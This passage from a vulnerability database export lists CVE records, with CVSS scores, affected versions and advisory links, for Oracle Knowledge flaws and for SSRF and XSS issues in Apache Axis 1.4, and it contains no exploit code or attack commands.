"url": "https://www.synology.com/security/advisory/Synology_SA_19_19"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.tenable.com/security/tns-2019-08"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.tenable.com/security/tns-2020-02"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-1321"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-15 14:15
Modified
2024-11-21 05:26
Severity ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Web Applications - InfoCenter). Supported versions that are affected are 8.6.0-8.6.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E587602-BA7D-4087-BE29-ACE0B01BD590",
"versionEndIncluding": "8.6.3",
"versionStartIncluding": "8.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Web Applications - InfoCenter). Supported versions that are affected are 8.6.0-8.6.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
},
{
"lang": "es",
"value": "Vulnerabilidad en el producto Oracle Knowledge de Oracle Knowledge (componente: Web Applications - InfoCenter). Las versiones compatibles que est\u00e1n afectadas son 8.6.0-8.6.3. Una vulnerabilidad explotable f\u00e1cilmente permite a un atacante no autenticado con acceso a la red por medio de HTTP comprometer a Oracle Knowledge. Los ataques con \u00e9xito de esta vulnerabilidad pueden resultar en la toma de control de Oracle Knowledge. CVSS 3.0 Puntuaci\u00f3n Base 9.8 (Impactos de la confidencialidad, la integridad y la disponibilidad). Vector CVSS: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
}
],
"id": "CVE-2020-2931",
"lastModified": "2024-11-21T05:26:39.737",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "secalert_us@oracle.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-15T14:15:36.247",
"references": [
{
"source": "secalert_us@oracle.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"sourceIdentifier": "secalert_us@oracle.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-15 14:15
Modified
2024-11-21 05:25
Severity ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data as well as unauthorized read access to a subset of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E587602-BA7D-4087-BE29-ACE0B01BD590",
"versionEndIncluding": "8.6.3",
"versionStartIncluding": "8.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data as well as unauthorized read access to a subset of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)."
},
{
"lang": "es",
"value": "Vulnerabilidad en el producto Oracle Knowledge de Oracle Knowledge (componente: Information Manager Console). Las versiones compatibles que est\u00e1n afectadas son 8.6.0-8.6.3. Una vulnerabilidad dif\u00edcil de explotar permite a un atacante no autenticado con acceso a la red por medio de HTTP comprometer a Oracle Knowledge. Los ataques con \u00e9xito de esta vulnerabilidad pueden resultar en una actualizaci\u00f3n no autorizada, insertar o eliminar el acceso a algunos de los datos accesibles de Oracle Knowledge, as\u00ed como el acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle Knowledge. CVSS 3.0 Puntuaci\u00f3n Base 4.8 (Impactos de la confidencialidad y la integridad). Vector CVSS:(CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)."
}
],
"id": "CVE-2020-2553",
"lastModified": "2024-11-21T05:25:31.290",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.2,
"impactScore": 2.5,
"source": "secalert_us@oracle.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-15T14:15:22.327",
"references": [
{
"source": "secalert_us@oracle.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"sourceIdentifier": "secalert_us@oracle.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-07-21 10:12
Modified
2024-11-21 02:50
Severity ?
Summary
Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote attackers to affect confidentiality and integrity via vectors related to Information Manager Console.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:knowledge:8.5:*:*:*:*:*:*:*",
"matchCriteriaId": "5AC44080-61DA-4E64-8D6B-991D53F171FE",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote attackers to affect confidentiality and integrity via vectors related to Information Manager Console."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en el componente Oracle Knowledge en Oracle Siebel CRM 8.5.x permite a atacantes remotos afectar la confidencialidad y la integridad a trav\u00e9s de vectores relacionados con Information Manager Console."
}
],
"id": "CVE-2016-3476",
"lastModified": "2024-11-21T02:50:05.250",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-07-21T10:12:29.413",
"references": [
{
"source": "secalert_us@oracle.com",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"source": "secalert_us@oracle.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/91787"
},
{
"source": "secalert_us@oracle.com",
"url": "http://www.securityfocus.com/bid/91948"
},
{
"source": "secalert_us@oracle.com",
"url": "http://www.securitytracker.com/id/1036400"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/91787"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/91948"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id/1036400"
}
],
"sourceIdentifier": "secalert_us@oracle.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-15 14:15
Modified
2024-11-21 05:26
Severity ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Knowledge executes to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H).
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*",
"matchCriteriaId": "774429F8-BEB6-4942-86C4-51129C11E655",
"versionEndIncluding": "8.6.2",
"versionStartIncluding": "8.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Knowledge executes to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H)."
},
{
"lang": "es",
"value": "Vulnerabilidad en el producto Oracle Knowledge de Oracle Knowledge (componente: Information Manager Console). Las versiones compatibles que est\u00e1n afectadas son 8.6.0-8.6.2. Una vulnerabilidad dif\u00edcil de explotar permite a un atacante muy privilegiado con inicio de sesi\u00f3n en la infraestructura donde se ejecuta Oracle Knowledge comprometer Oracle Knowledge. Los ataques con \u00e9xito requieren una interacci\u00f3n humana de una persona diferente del atacante. Los ataques con \u00e9xito de esta vulnerabilidad pueden resultar en la toma de control de Oracle Knowledge. CVSS 3.0 Puntuaci\u00f3n Base 6.3 (Impactos de la confidencialidad, la integridad y la disponibilidad). Vector CVSS: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H)."
}
],
"id": "CVE-2020-2795",
"lastModified": "2024-11-21T05:26:17.380",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 0.3,
"impactScore": 5.9,
"source": "secalert_us@oracle.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.3,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-15T14:15:27.747",
"references": [
{
"source": "secalert_us@oracle.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"sourceIdentifier": "secalert_us@oracle.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
cve-2020-2524
Vulnerability from cvelistv5
Published
2020-04-15 13:29
Modified
2024-09-30 15:47
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: InQuira Search). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.oracle.com/security-alerts/cpuapr2020.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | Knowledge |
Version: 8.6.0-8.6.3 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T07:09:54.386Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2020-2524",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-30T15:00:44.083683Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-30T15:47:08.910Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Knowledge",
"vendor": "Oracle Corporation",
"versions": [
{
"status": "affected",
"version": "8.6.0-8.6.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: InQuira Search). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-15T13:29:43",
"orgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"shortName": "oracle"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert_us@oracle.com",
"ID": "CVE-2020-2524",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Knowledge",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "8.6.0-8.6.3"
}
]
}
}
]
},
"vendor_name": "Oracle Corporation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: InQuira Search). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)."
}
]
},
"impact": {
"cvss": {
"baseScore": "5.9",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.oracle.com/security-alerts/cpuapr2020.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"assignerShortName": "oracle",
"cveId": "CVE-2020-2524",
"datePublished": "2020-04-15T13:29:43",
"dateReserved": "2019-12-10T00:00:00",
"dateUpdated": "2024-09-30T15:47:08.910Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-0227
Vulnerability from cvelistv5
Published
2019-05-01 20:03
Modified
2024-08-04 17:44
Severity ?
EPSS score ?
Summary
A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache | Apache Axis 1.4 |
Version: Apache Axis 1.4 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T17:44:15.943Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://rhinosecuritylabs.com/application-security/cve-2019-0227-expired-domain-rce-apache-axis/"
},
{
"name": "[announce] 20200131 Apache Software Foundation Security Report: 2019",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"name": "[axis-java-user] 20210928 [Axis2] Migration Issues",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r3a5baf5d76f1f2181be7f54da3deab70d7a38b5660b387583d05a8cd%40%3Cjava-user.axis.apache.org%3E"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Axis 1.4",
"vendor": "Apache",
"versions": [
{
"status": "affected",
"version": "Apache Axis 1.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "SSRF",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T19:06:44.096728",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"url": "https://rhinosecuritylabs.com/application-security/cve-2019-0227-expired-domain-rce-apache-axis/"
},
{
"name": "[announce] 20200131 Apache Software Foundation Security Report: 2019",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E"
},
{
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"name": "[axis-java-user] 20210928 [Axis2] Migration Issues",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/r3a5baf5d76f1f2181be7f54da3deab70d7a38b5660b387583d05a8cd%40%3Cjava-user.axis.apache.org%3E"
},
{
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2019-0227",
"datePublished": "2019-05-01T20:03:49",
"dateReserved": "2018-11-14T00:00:00",
"dateUpdated": "2024-08-04T17:44:15.943Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-8032
Vulnerability from cvelistv5
Published
2018-08-02 13:00
Modified
2024-09-16 16:29
Severity ?
EPSS score ?
Summary
Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Axis |
Version: 1.x up to and including 1.4 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:46:12.311Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
